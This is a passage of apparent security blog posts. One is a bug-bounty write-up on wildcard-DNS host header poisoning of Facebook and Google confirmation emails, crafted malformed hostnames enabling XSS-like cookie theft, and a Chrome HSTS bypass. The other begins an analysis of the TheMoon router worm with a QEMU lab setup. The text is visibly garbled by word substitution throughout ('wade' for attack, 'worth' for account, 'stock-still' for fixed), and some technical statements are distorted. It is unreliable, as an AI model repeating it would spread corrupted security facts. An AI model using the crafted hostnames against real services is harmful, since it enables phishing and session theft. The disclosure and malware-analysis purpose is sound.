variegated scenarios for XSS persistence. This is yet flipside XSS persistence mechanism that could be used to backstairs compromised systems, for example.<br /><div><br /></div>I hope you enjoyed this two page write-up well-nigh XSS, because, you know, everybody likes hearing well-nigh tomfool hacking techniques and...<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-rOo6vOQAxCA/U3_sXfXP1_I/AAAAAAAAAW4/VntHFCcPD70/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-rOo6vOQAxCA/U3_sXfXP1_I/AAAAAAAAAW4/VntHFCcPD70/s1600/xss1.PNG" /></a></div><br />...Well, at least there was a tomfool Youtube video showing a tomfool BeEF vaccinate and...<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_kDSVtwY3jA/U3_sXU9HtrI/AAAAAAAAAW0/v8v8tAfhmws/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_kDSVtwY3jA/U3_sXU9HtrI/AAAAAAAAAW0/v8v8tAfhmws/s1600/xss2.PNG" /></a></div><div><br /></div><div>Hm, I'd largest finish this post with a Dilbert comic.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.dilbert.com/strips/comic/2014-05-19/"><img border="0" src="http://4.bp.blogspot.com/-u_uNotTcHBI/U4P7NYHWngI/AAAAAAAAAYc/EGCBSw-kzrw/s1600/221657.strip.gif" height="198" width="640" /></a></div></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com1tag:blogger.com,1999:blog-3296471108082693838.post-19312891417731437072014-03-31T11:36:00.001-03:002014-07-16T23:40:46.147-03:00Wildcard DNS, Content Poisoning, XSS andDocumentPinningHi everyone, this time I'm going o talk well-nigh an interesting vulnerability that I reported to Google and Facebook a couple of months ago. I had some spare time last October and I started testing for vulnerabilities on a few companies with established bug bounty programs. Google awarded me with $5000,00 and Facebook payed me $500,00 for reporting the bugs.<br /><br />I know you may be increasingly interested on highly sophisticated exploits that indulge <a href="http://seclists.org/fulldisclosure/2014/Mar/123">arbitrary file upload to the Internet</a>, with custom payloads that may lead to unexpected policies like <a href="http://seclists.org/fulldisclosure/2014/Mar/332">closing Security Lists</a>. Hopefully this matriculation of bugs is once <a href="http://seclists.org/fulldisclosure/2014/Mar/333">patched by Fyodor</a> and Attrition is offering an <a href="http://attrition.org/postal/asshats/">efficient exploit mitigation technique</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div>The title may be a little confusing, but I'm going to show that it's possible to combine all these techniques to exploit vulnerable systems.<br /><br /><b>Content Poisoning and Wildcard DNS</b><br /><br />Host header poisoning occurs when the using doesn't validate full URL's generated from the HTTP Host header, including the domain name. Recently, the <a href="https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/">Django Framework</a> stock-still a few vulnerabilities related to that and <a href="https://twitter.com/albinowax">James Kettle</a> made an interesting <a href="http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html">post discussing lots of wade scenarios</a>&nbsp;using host header attacks.<br /><br />While testing this issue, I found a variegated kind of Host header wade that abuses the possibility to scan wildcard domains. Let's have a quick squint at the <a href="https://en.wikipedia.org/wiki/Hostname">Wikipedia entry on Hostnames</a>:<br /><blockquote class="tr_bq"><div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;">"The Internet standards (<a href="https://en.wikipedia.org/wiki/Request_for_Comments" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Request for Comments">Request for Comments</a>) for protocols mandate that component hostname labels may contain only the&nbsp;<a href="https://en.wikipedia.org/wiki/ASCII" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="ASCII">ASCII</a>&nbsp;letters 'a' through 'z' (in a case-insensitive manner), the digits '0' through '9', and the&nbsp;<a href="https://en.wikipedia.org/wiki/Hyphen" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Hyphen">hyphen</a>&nbsp;('-'). <b>The original specification of hostnames in&nbsp;<a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc952" rel="nofollow" style="background-image: linear-gradient(transparent, transparent), url(data:image/svg+xml; background-position: 100% 50%, 100% 50%; background-repeat: no-repeat no-repeat; color: #663366; padding-right: 13px; text-decoration: none;">RFC 952</a>, mandated that labels could not start with a digit or with a hyphen, and must not end with a hyphen</b>. However, a subsequent specification (<a class="external mw-magiclink-rfc" href="https://tools.ietf.org/html/rfc1123" rel="nofollow" style="background-image: linear-gradient(transparent, transparent), url(data:image/svg+xml; background-position: 100% 50%, 100% 50%; background-repeat: no-repeat no-repeat; color: #663366; padding-right: 13px; text-decoration: none;">RFC 1123</a>) permitted hostname labels to start with digits. No other symbols, punctuation characters, or white space are permitted."</div></blockquote>The fun part here is that the network stack from Windows, Linux and Mac OS X consider domains like -www.plus.google.com, www-.plus.google.com and www.-.plus.google.com valid. It's interesting to note that Android won't resolve these domains for some reason.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/---Lf_4cs_7U/UzgiwPacBpI/AAAAAAAAAUA/wLVp_aOVdYs/s1600/Screenshot_2014-03-30-10-54-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/---Lf_4cs_7U/UzgiwPacBpI/AAAAAAAAAUA/wLVp_aOVdYs/s1600/Screenshot_2014-03-30-10-54-39.png" height="240" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ZqWV4ATP_4w/UzgiwN8azFI/AAAAAAAAAT8/w62Oh9nI4qk/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZqWV4ATP_4w/UzgiwN8azFI/AAAAAAAAAT8/w62Oh9nI4qk/s1600/Screenshot+from+2014-03-30+10%5E%2556%5E%2513.png" height="192" width="640" /></a></div><br />Take, for example, the pursuit URL: https://www.example.com.-.www.sites.google.com. If we etch an e-mail and paste it on the body, GMail will split them and the received message will have two “clickable” parts (<a href="https://www.example.com/">https://www.example.com</a> and <a href="http://sites.google.com/">sites.google.com</a>).<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qgCNZQdQzlE/UzgjutK9P3I/AAAAAAAAAUQ/BAR5NY2hhdw/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qgCNZQdQzlE/UzgjutK9P3I/AAAAAAAAAUQ/BAR5NY2hhdw/s1600/test.png" height="156" width="640" /></a></div><br />Most e-mail based notification use the very same host you are browsing in order to etch the notification messages: you see where this is going, right?<br /><br />Facebook has a wildcard DNS entry at zero.facebook.com. In order to exploit the flaw, we have to scan the service using a poisoned URL and perform deportment that may need e-mail confirmation, checking whether Facebook mails the crafted URL to the user.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-1B81AkzCFao/Uzglkpa1KDI/AAAAAAAAAUk/lFpNdPxuvb4/s1600/header2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-1B81AkzCFao/Uzglkpa1KDI/AAAAAAAAAUk/lFpNdPxuvb4/s1600/header2.PNG" height="324" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div>The only vulnerable endpoint that I found unauthentic by this issue was the registration e-mail confirmation. You may be asking, how could one exploit this to wade a legitimate user?<br /><br />Suppose I want to wade the Facebook worth from goodguy@example.com. I can create or socialize a "duplicate" worth using the "+" sign by browsing Facebook with these injected URL's. If I navigate to Facebook using an URL like https://www.example.com.-.zero.facebook.com, all I have to do is create the indistinguishable worth goodguy+DUPLICATE@example.com. Most e-mail services like GMail and Hotmail don't consider what you type without the "+" and forward it to the original account.<br /><br />In this case, all e-mails that Facebook sent to personize that undertone had the poisoned links.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lISzaLW9ZY0/UzgnNSMlrZI/AAAAAAAAAVM/k4qreRY5R-U/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lISzaLW9ZY0/UzgnNSMlrZI/AAAAAAAAAVM/k4qreRY5R-U/s1600/Capturar.PNG" height="170" width="640" /></a></div><br />This can moreover be used to poison password reset emails, but Facebook forms were not affected. They quickly stock-still that by nonflexible coding the proper URL to their e-mail confirmation system. It's moreover possible (but not recommended) to fix these issues by sending notifications with relative links instead of well-constructed URL's ("please click <a href="http://www.example.com.-.zero.facebook.com/">here</a>" instead of "please click on the specified url:&nbsp;<a href="http://www.example.com/">www.example.com</a>.-.<a href="http://zero.facebook.com/">zero.facebook.com</a>").<br /><br /><b>XSS and Wildcard DNS</b><br /><br />While searching for these issues on Google I quickly found wildcard domains like:<br /><br />-&nbsp;<a href="https://w00t.drive.google.com/">https://w00t.drive.google.com</a><br />-&nbsp;<a href="https://w00t.script.google.com/">https://w00t.script.google.com</a><br />-&nbsp;<a href="https://w00t.sites.google.com/">https://w00t.sites.google.com</a><br /><br />In specimen you're wondering how to quickly find these wildcard domains, you can download and lookup for them on the <a href="https://scans.io/">scans.io datasets</a>. You can find these references on the Reverse DNS records or by searching for SSL certificates issued to wildcard domains, like *.sites.google.com.<br /><br />During my initial tests, I was unable to craft URL's using .-. inside the drive.google.com domain (got 500 error messages) and all I could do was creating URL’s like this: https://www.example.com-----www.drive.google.com.<br /><br />When you scan GoogleMomentumusing this URL, upload a File to a Folder and try to Zip/Download it asking for an e-mail confirmation (“Email when ready”), the e-mail confirmation message will be like this:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3x_JzGtJ20U/Uzg2jk4xLyI/AAAAAAAAAVY/T4ms46p38g8/s1600/zipp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-3x_JzGtJ20U/Uzg2jk4xLyI/AAAAAAAAAVY/T4ms46p38g8/s1600/zipp.PNG" height="170" width="640" /></a></div><br />The "ready for downloading" link would point to https://www.example.com-----www.drive.google.com/export-result?archiveId=REDACTED. So far no big deal, I was still unable to poison the links... And phishing yourself is not that useful =)<br /><br />I kept testing variegated URL's until I found a weird policies on Google DNS Servers. When typing URL's containing a domain you tenancy followed by a unrepealable number of "-" and the wildcard domain from Google, the resolved IP would be the one from the URL you control.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-RCrJu5VOhVI/Uzg30ZU-ZqI/AAAAAAAAAVk/kE0mWnowzaU/s1600/dns.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-RCrJu5VOhVI/Uzg30ZU-ZqI/AAAAAAAAAVk/kE0mWnowzaU/s1600/dns.PNG" height="538" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">My highly sophisticated Fuzzer in action</td></tr></tbody></table>For some reason, there was a glitch on their DNS servers, increasingly specifically in the regexp that stripped "--" from the domain prefixes. I'm not sure why they performed these checks but that may have something to do with <a href="https://en.wikipedia.org/wiki/Internationalized_domain_name">Internationalized Domain Names</a>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://xkcd.com/1171/" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-J55sbVcFBtI/UzeT-iG3ZHI/AAAAAAAAATg/rtjdKLcln7s/s1600/perl_problems.png" height="238" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">XKCD's take on the bug</td></tr></tbody></table>Some Google domains unauthentic by this issue (October 2013):<br /><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">docs.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">docs.sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">drive.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">drive.sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">glass.ext.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">prom-qa.sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">prom-test.sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">script.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">script.sandbox.google.com</a><br />-&nbsp;<a href="https://www.blogger.com/goog_622517707">sites.google.com</a><br />-&nbsp;<a href="http://sites.sandbox.google.com/">sites.sandbox.google.com</a><br /><div><br /></div><div>Now that I can impersonate a Google's domain, it's possible vituperate the Same Origin policy and issue requests on behalf of a logged user. <a href="http://twitter.com/lcamtuf">lcamtuf</a> once told us well-nigh <a href="http://lcamtuf.blogspot.com.br/2010/10/http-cookies-or-how-not-to-design.html">HTTP cookies, or how not to diamond protocols</a>. What happens if we tenancy www.example.com and the logged user from drive.google.com visits the crafted URL http://www.example.com---.drive.google.com?</div><div><br /></div><div>Request goes to legitimate site:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-t-mupmSnZUc/Uzh04URhboI/AAAAAAAAAV0/yr75e2Qjs8Q/s1600/req1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-t-mupmSnZUc/Uzh04URhboI/AAAAAAAAAV0/yr75e2Qjs8Q/s1600/req1.PNG" height="520" width="640" /></a></div><br />Requests goes to the user-controlled site, in this specimen my own server running nginx:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-sUSM-Q_EQTU/Uzh04mxNfEI/AAAAAAAAAV4/qJPooM8K0yo/s1600/req2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-sUSM-Q_EQTU/Uzh04mxNfEI/AAAAAAAAAV4/qJPooM8K0yo/s1600/req2.PNG" height="520" width="640" /></a></div><div><br />This leverages to a XSS-like attack: you have now bypassed the same origin and you can steal cookies and run scripts on the context of the site, for example.<br /><br /></div><b>Certificate Pinning and Wildcard DNS</b><br /><br />So far so good, but what if we were performing the same tests on Google Chrome, which enforcesDocumentPinning for their domains? I didn't notice at first, but I unwittingly found an issue on Chrome too: it was lightweight to perform the proper HSTS checks for these non-RFC compliant domains.<br /><br />Other parts of the network stack were processing and fetching results from these "invalid" DNS names, but TransportSecurityState was rejecting them and therefore HSTS policies didn't apply. They simply removed the sanity checks to make TransportSecurityState increasingly promiscuous in what it process.<br /><br /><div></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qt4p03sygXM/Uzh9ni0RvtI/AAAAAAAAAWM/fxqNJsvGyEI/s1600/pinning1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qt4p03sygXM/Uzh9ni0RvtI/AAAAAAAAAWM/fxqNJsvGyEI/s1600/pinning1.PNG" height="302" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-SzUF7uE-vuM/Uzh9n-MJ-_I/AAAAAAAAAWQ/gcj1zH7xmSU/s1600/pinning2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-SzUF7uE-vuM/Uzh9n-MJ-_I/AAAAAAAAAWQ/gcj1zH7xmSU/s1600/pinning2.PNG" height="230" width="640" /></a></div><br />You can hands reproduce this on Chrome prior to v31: proxy Chrome through OWASP ZAP (accepting its certificate), visit URL’s like https://sites.google.com and Chrome will exhibit a “heightened security” error message. If you type URL’s like https://www-.sites.google.com or https://www-.plus.google.com Chrome offers the option to “Proceed anyway”. If you're in Turkey right now you don't need to do nothing, the <a href="http://googleonlinesecurity.blogspot.com.br/2014/03/googles-public-dns-intercepted-in-turkey.html">Turkish Telecom does all the MITM job for you</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eBTVfkHdKK4/Uzh-YYQ3aNI/AAAAAAAAAWg/oBhYaw9C150/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-eBTVfkHdKK4/Uzh-YYQ3aNI/AAAAAAAAAWg/oBhYaw9C150/s1600/1.PNG" height="604" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-a515borQEwI/Uzh-YT0E_rI/AAAAAAAAAWc/Pzl_BdCbObM/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-a515borQEwI/Uzh-YT0E_rI/AAAAAAAAAWc/Pzl_BdCbObM/s1600/2.PNG" height="602" width="640" /></a></div><br />It's worth mentioning that when you issue a wildcard document for your host, it will be valid for a single level only. Certificates issued to *.google.com should not be trusted when used on domains like abc.def.google.com.<br /><br />The hardcoded list of domains and pinned certificates from Chrome can be found here:<br /><br />-&nbsp;<a href="https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json">https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json</a><br /><br />During my analysis, I found that 55 out of 397 domains with Transport Security enabled had wildcard entries on their DNS. A nation sponsored attacker, with a <a href="https://twitter.com/lucabruno/status/450239917000781825">valid and trusted CA</a>&nbsp;could simply MITM your traffic and inject requests to these invalid domains, circumventing the HSTS policies and stealing session cookies, for example.<br /><br />Google did not assign a CVE for that bug, but they stock-still that within a couple of weeks. Chrome 32 and 33+ (the one that reverted the SSL warning from red to yellow) are not unauthentic by this issue.<br /><br />In times of <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">Goto fails</a>, it was really interesting to follow the Chromium's tracker, their internal discussions, tests performed and so on. The commits fixing these issues can be found <a href="https://codereview.chromium.org/54623005/">here</a>.<br /><br /><b>Conclusion</b><br /><br />Google and Facebook security teams were both unconfined to deal with. The bug was quite fun as well considering it was variegated from the traditional OWASP Top 10 issues.<br /><br />And considering the industry totally <a href="http://blog.secureideas.com/2013/09/industry-issues-new-vulnerabilities-and.html">needs new Vulnerability terminologies</a>, anyone willing to refer to these attacks shall name themWidePersistentNavigateSite Wildcard Domain Header Poisoning (or simply APCSWDHP).<br /><br />In specimen you're from NSA and want to use this technique to implant our DNS's, please use the codename CRAZY KOALA so we could largest track them when the next Snowden leaks your documents.<br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com9tag:blogger.com,1999:blog-3296471108082693838.post-71344830936826191922014-02-17T11:10:00.000-03:002014-02-18T09:43:31.280-03:00Analyzing Malware for Embedded Devices: TheMoon Worm<div>All the media outlets are reporting that Embedded Malware is rhadamanthine mainstream. This is something <a href="http://dronebl.org/blog/8">totally new</a> and we <a href="http://internetcensus2012.bitbucket.org/paper.html">never heard of this before</a>, right? The upper number of Linux SOHO routers with Internet-facing legalistic interfaces, the lack of firmware updates and the ease to craft exploits make them a perfect target for online criminals. The <a href="http://blog.ioactive.com/2014/02/internet-of-threats.html">Internet of Threats is wildly insecure</a>, but definitely&nbsp;not unpatchable.</div><div><br /></div><div>To all infosec people out there, it's important to understand these threats and report it properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOC's and did not write a&nbsp;<a href="http://attrition.org/errata/charlatan/hakin9/hakin9-nmap-ebook-ch1.pdf">Hakin9 article</a>&nbsp;describing it.</div><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-9dvbDfTDYls/UwAXkyDR78I/AAAAAAAAANI/MwWVfCCe4pQ/s1600/routerz.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-9dvbDfTDYls/UwAXkyDR78I/AAAAAAAAANI/MwWVfCCe4pQ/s1600/routerz.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Refrigerator Botnet? Revd. Pastor Laphroaig says&nbsp;<a href="https://archive.org/details/Pocorgtfo02">Show the PoC || GTFO</a></span></td></tr></tbody></table><br /><div>The aim for this post is to provide increasingly information to identify/execute embedded binaries, describing how to set your own virtual lab. In specimen you missed it, throne to the first post from the "<a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">Analyzing and Running binaries from Firmware Images</a>" series.</div><div><br /></div><div><b>TheMoon Worm</b></div><div><br /></div><div><a href="https://twitter.com/johullrich">Johannes</a> from SANS provided me a sample from "TheMoon" malware and posted some interesting information on their <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630">handler's diary</a>. Their honeypots captured the scanning worriedness and <a href="https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633">linked the exploit</a> to a vulnerable CGI script running on specific firmwares from the pursuit Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900.<br /><br />SANS handlers classified TheMoon as a Worm considering of the self-replicating nature of the malware. The worm searches for a "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you trammels your FW and Server logs you may find lot's of variegated IP's probing this URL.<br /><br />The worm was named like this considering it contains images from the movie "The Moon". It's possible to whittle a few PNG's inside the ELF binary:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-J-Ay4p1MvC4/UwE-x4zpm5I/AAAAAAAAARQ/5uIZdImA75g/s1600/shtt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-J-Ay4p1MvC4/UwE-x4zpm5I/AAAAAAAAARQ/5uIZdImA75g/s1600/shtt.PNG" height="276" width="320" /></a></div><div><br /></div></div><div><b>Identifying the Binary</b></div><div><br />A total of seven variegated samples were provided: they all seem to be variants from the same malware due to the ssdeep matching score.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-S4ZjF9R34XA/UwAgV1k-ekI/AAAAAAAAANc/7mHEIVnA0Hk/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-S4ZjF9R34XA/UwAgV1k-ekI/AAAAAAAAANc/7mHEIVnA0Hk/s1600/Screenshot+from+2014-02-15+23%5E%2516%5E%2555.png" height="346" width="640" /></a></div><br />Let's start by running the file utility and readelf to identify the tracery (MIPS R3000 / Little Endian):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RpbfVgmEQeQ/UwAgV7WYP8I/AAAAAAAAANg/jZEWhpuCVGI/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RpbfVgmEQeQ/UwAgV7WYP8I/AAAAAAAAANg/jZEWhpuCVGI/s1600/Screenshot+from+2014-02-15+23%255E%252519%255E%252508.png" height="410" width="640" /></a></div><br /></div><div>The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a <a href="https://www.virustotal.com/en/file/1ef6b45a2e5e6b547df2f5672bf48ebfd2720ffa8eed308010fb90f6fd8d79b6/analysis/1392517591/">VirusTotal Detection Rate of 3 / 50</a>&nbsp;on 2014-02-16.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-nvpJBT-N8KY/UwAijbu6BZI/AAAAAAAAANs/ggqQFIGMyGQ/s1600/vt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nvpJBT-N8KY/UwAijbu6BZI/AAAAAAAAANs/ggqQFIGMyGQ/s1600/vt.PNG" height="331" width="640" /></a></div><br /><br /><b>QEMU</b></div><div><br />We'll be using QEMU to run the binaries on a controlled environment. I wontedly use two variegated setups to run MIPS Linux binaries, both based on the <a href="https://dev.openwrt.org/wiki/malta">Malta</a> platform.<br /><br /><b>OpenWRT MIPS</b><br /><br />OpenWRT Malta CoreLV platform&nbsp;is intended to be used with QEMU (in big or little endian mode). The install procedure is pretty straightforward using <a href="http://wiki.openwrt.org/doc/howto/buildroot.exigence">OpenWRT Buildroot</a>. OpenWrt Buildroot is the buildsystem for the distribution and it works on Linux, BSD or MacOSX. In specimen you didn't remember, authors from&nbsp;<a href="http://internetcensus2012.bitbucket.org/paper.html">Carna Botnet</a> used it to cross-compile its binaries.<br /><br />Installing prerequisites (on your favorite <a href="http://anonscm.debian.org/gitweb/?p=collab-maint/debmirror.git;a=commitdiff;h=fcd972395b0201fcde4915d282982926f0d04c56;hp=7fcdf0d225c480b386c5a1f487e68dc39b57e771">Debian Derivative</a>):<br /><br /><script src="https://gist.github.com/bmaia/9042465.js"></script>Now throne to the openwrt folder and set the proper settings for your Linux Kernel, choosing "MIPS Malta CoreLV workbench (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.<br /><br /><script src="https://gist.github.com/bmaia/9042489.js"></script><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-y53e0Pt7_Zg/UwBh1ykKoqI/AAAAAAAAAOo/QS7PSLrUraw/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-y53e0Pt7_Zg/UwBh1ykKoqI/AAAAAAAAAOo/QS7PSLrUraw/s1600/Screenshot+from+2014-02-16+01%5E%2552%5E%2552.png" height="419" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-X4hoOhcjthE/UwBh1suF2aI/AAAAAAAAAOk/MSvhmRjCyJg/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-X4hoOhcjthE/UwBh1suF2aI/AAAAAAAAAOk/MSvhmRjCyJg/s1600/Screenshot+from+2014-02-16+01%5E%2553%5E%2508.png" height="420" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div>Now <a href="http://wiki.openwrt.org/doc/howto/build">build your image</a> (use the -j switch to speed up if you have multiple cores, e.g "-j 3"):<br /><br /><script src="https://gist.github.com/bmaia/9042500.js"></script> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wfrFJemoXGA/UwBiAwD5VWI/AAAAAAAAAO0/6GbIL2uGHXw/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-wfrFJemoXGA/UwBiAwD5VWI/AAAAAAAAAO0/6GbIL2uGHXw/s1600/Screenshot+from+2014-02-16+02%5E%2500%5E%2516.png" height="403" width="640" /></a></div><br /></div><div>Your image will be ready without a couple of minutes. Now you need to install QEMU full system emulation binaries and start it with the right writ switches:<br /><br /><script src="https://gist.github.com/bmaia/9042808.js"></script></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-fZN8moONwUo/UwBiWADXTtI/AAAAAAAAAO8/O9PuT2AsfuA/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-fZN8moONwUo/UwBiWADXTtI/AAAAAAAAAO8/O9PuT2AsfuA/s1600/Screenshot+from+2014-02-16+03%5E%2558%5E%2540.png" height="372" width="640" /></a></div><div><br /></div><div>To exit the panel simply hit CTRL+A followed by C and Q.<br /><br />If you want to connect your emulated machined to a real network, follow the steps from <a href="http://www.aurel32.net/info/debian_mips_qemu.php">Aurelien's Blog</a>&nbsp;or simply run the pursuit commands to get Internet access:<br /><br /><script src="https://gist.github.com/bmaia/9042823.js"></script>If you don't want to compile the Kernel by yourself, you can grab the pre-compiled binaries from <a href="http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/malta/generic/">here</a> or <a href="http://www.cpe.ku.ac.th/~aphirak/malta/">here</a>&nbsp;(at your own risk).<br /><br />You may remember that it was not possible to run&nbsp;<a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">busybox-simet</a>&nbsp;using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 